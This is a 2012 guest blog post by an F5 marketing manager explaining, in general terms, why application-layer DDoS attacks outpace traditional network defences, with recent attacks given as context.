Why DDos attacks persist

March 16th, 2012

Denial of services attacks made big news in 2011 as hacktivists refined techniques to rally like-minded protestors to shut down targeted websites for ideological reasons. Sony, Visa, MasterCard, the U.S. Chamber of Commerce and many others got hit.

That trend has not abated. And now governments may be getting into the act, orchestrating such attacks. Earlier this week the BBC accused the Iranian government for disrupting the news organization’s e-mail and web pages, along with jamming the BBC’s satellite feeds into Iran.

In this LastWatchdog guest post, Lori MacVittie, Senior Technical Marketing Manager at application delivery networking firm F5, delves into the technical underpinnings of modern-day DDos attacks.

MacVittie

By Lori MacVittie.

The success of Distributed Denial-of-service (DDos) attacks today is more about what an attacker is trying to do with the traffic than just how much traffic they generate.

Certainly massive volumes of traffic can overwhelm a site in any number of ways, but such attacks are costly and require coordination to execute. It takes hundreds of thousands of machines to generate the kind of volume necessary to overwhelm the public-facing presence of an organization today. Network infrastructure has become adept at not only handling such volume but recognizing a traditional DDoS attack for what it is, and putting the brakes on the traffic to protect a company’s presence.

This is why we’ve seen a rise in attacks directed at the application layers – exploits based on protocol behavior and basic application logic assumed by all web and application servers. These attacks offer maximum effect with minimal effort, requiring less coordination and fewer resources on the part of the attacker while still managing to disrupt services from even those organizations one hop from the Internet backbone.

A week-long DDoS attack in early November , targeting an Asian e-commerce retailer, was one of the largest in 2011: it reached traffic volumes of 45 Gbps. Yet waves of other attacks that have generated far less traffic volume have been far more successful in accomplishing the task of taking down a website.

Modern attacks

As noted by reports of the aforementioned attack, at its peak attackers were able to make 15,000 connections per second to the target company’s servers. This is the key to understanding modern attack methods. While network infrastructure can detect and throttle back traditional attack methods, it is not so good at detecting and throttling back modern attack methods that target application protocols. That this company saw connections being made to its servers indicates a failure on the part of its network and application delivery network infrastructure to correctly identify and execute appropriate measures to halt the attack.

This is likely for the same reason similar attacks have been successful in the past: the network and security infrastructure in place is simply not imbued with the intelligence necessary to distinguish between legitimate application requests and those that are not. The key to doing so lies in understanding interaction behavior at the protocol layers and being able to apply that understanding to live interactions in a way that clearly distinguishes illegitimate from legitimate requests. When clients behave in ways inconsistent with the network and client characteristics present in every connection attempt, it should trigger an alarm in the infrastructure that puts it on alert, ready to clamp down when a certain threshold of traffic or requests is seen.

Because network infrastructure today is unable to accurately distinguish between bad and good requests, it can do little more than pass the requests to servers. Those servers, despite the ever-increasing computing resources available, are still simply unable to handle the volume of connections being attempted. The end result is almost always a disruption of service. In an auto-scaling cloud computing environment, service may continue – but at a very high cost, as automated systems launch more and more virtual servers to handle the load, each one incurring costs on an hourly basis.

Traditional security mechanisms are excellent protection against traditional attackers. Sadly, however, they are largely ineffective against emerging modern attacks. Organizations need to recognize the changing focus of attackers from the network to the application layers and evaluate their strategy and infrastructure in light of how well such components would recognize and put a stop to modern attacks.

About the essayist. Lori MacVittie is responsible for F5’s outbound marketing, education, and evangelism of application. Her role includes authorship of technical materials and participation in a number of community-based forums and industry standards organizations, among other efforts.